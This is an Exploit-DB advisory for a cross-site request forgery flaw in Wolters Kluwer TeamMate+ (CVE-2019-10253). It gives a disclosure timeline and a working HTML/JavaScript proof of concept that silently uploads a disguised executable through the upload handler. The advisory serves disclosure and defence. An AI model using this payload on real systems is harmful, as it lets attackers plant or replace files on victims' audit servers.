exploit-db-mirror/exploits/multiple/webapps/47342.html
Offensive Security 1979df6cb3 DB: 2020-06-19

Hello,
Please find the vulnerability details below,
---------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Wolters Kluwer TeamMate+ Cross-Site Request Forgery (CSRF) vulnerability
# Date: 02/09/2019
# Exploit Author: Bhadresh Patel
# Version: <= TeamMate Version 3.1 (January 2019) (Internal Version: 21.0.0.0)
# CVE : CVE-2019-10253
This is an advisory with PoC exploit code for the Wolters Kluwer TeamMate+
Cross-Site Request Forgery (CSRF) vulnerability.
---------------------------------------------------------------------------------------------------------------------------------
Title:
====
Wolters Kluwer TeamMate+ Cross-Site Request Forgery (CSRF) vulnerability
CVE:
====
CVE-2019-10253
Date:
====
02/09/2019 (dd/mm/yyyy)
Vendor:
======
Wolters Kluwer is a global leader in professional information, software
solutions, and services for the health, tax & accounting, finance, risk &
compliance, and legal sectors. We help our customers make critical
decisions every day by providing expert solutions that combine deep domain
knowledge with specialized technology and services.
Vendor link: http://www.teammatesolutions.com/about-us.aspx
Vulnerable Product:
==============
TeamMate+
TeamMate Global Audit Solutions, part of the Tax and Accounting Division of
Wolters Kluwer, helps professionals in all industries at organizations
around the world manage audit and compliance risks and business issues by
providing targeted, configurable, and efficient software solutions.
Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate
Analytics. Together, this ecosystem of solutions provides organizations
with the combined assurance they need to manage all aspects of risk
identification and assessment, electronic working paper creation and
management, controls framework management, and data analysis.
Abstract:
=======
A Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an
attacker to upload malicious/forged files to the TeamMate server, or replace
existing uploaded files with malicious/forged files, by enticing an
authenticated user to visit an attacker-controlled page.
Report-Timeline:
================
19/03/2019: Vendor notified
19/03/2019: Vendor responded requesting further information
20/03/2019: Further technical information with PoC was shared with vendor
01/07/2019: Vendor fixed the issue in version 3.2
Affected Software Version:
==========================
<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0)
Exploitation-Technique:
=======================
Remote
Severity Rating (CVSS):
=======================
4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVE ID:
=======
CVE-2019-10253
Details:
=======
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in
TeamMate+ which allows a remote attacker to modify application data (upload
malicious/forged files to the TeamMate server or replace existing uploaded
files with malicious/forged files) without the victim's knowledge by enticing
an authenticated user to visit an attacker-controlled page/URL.
The specific flaw exists within the handling of requests to the
"DomainObjectDocumentUpload.ashx" handler. The application did not validate
a CSRF token before processing the multipart POST request, so the request is
authorised by the victim's session cookie alone. The numeric identifiers in
the PoC (parentId, AssessmentId, ProjectId, ParentNodeType,
DocumentParentObjectType) appear to be values from the tested instance; an
attacker needs identifiers that are valid for the target. The attack also
depends on the browser attaching the session cookie to a cross-site POST,
which browsers that default cookies to SameSite=Lax no longer do unless the
cookie is explicitly set with SameSite=None.
Vulnerable module/page/application:
/TeamMate/Upload/DomainObjectDocumentUpload.ashx
PoC Exploit code:
----------------------------------------------------------------------------
<html>
<body onload="submitRequest()">
<script>
function submitRequest()
{
  // Cross-site POST to the upload handler. The victim's session cookie is
  // attached because withCredentials is set. Replace <ServerIP> and the
  // numeric IDs with values valid for the target instance.
  var xhr = new XMLHttpRequest();
  xhr.open("POST",
    "https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx",
    true);
  xhr.setRequestHeader("Accept", "text/html, */*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8");
  // multipart/form-data is a CORS-safelisted content type, so the browser
  // sends this as a plain POST without a preflight request.
  xhr.setRequestHeader("Content-Type",
    "multipart/form-data; boundary=----WebKitFormBoundaryNA930lURoQYsoTOn");
  xhr.withCredentials = true;
  var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"fileObjectId\"\r\n" +
    "\r\n" +
    "0\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"parentId\"\r\n" +
    "\r\n" +
    "1373\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"AssessmentId\"\r\n" +
    "\r\n" +
    "34\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"ProjectId\"\r\n" +
    "\r\n" +
    "1106\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" +
    "\r\n" +
    "50\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"DocumentParentObjectType\"\r\n" +
    "\r\n" +
    "90\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
    "Content-Disposition: form-data; name=\"files[]\"; filename=\"Report.txt\"\r\n" +
    "Content-Type: application/x-msdownload\r\n" +
    "\r\n" +
    "MZP\r\n" +
    "------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n";
  // Send the body as raw bytes so the browser does not re-encode it.
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
----------------------------------------------------------------------------
Credits:
=======
Bhadresh Patel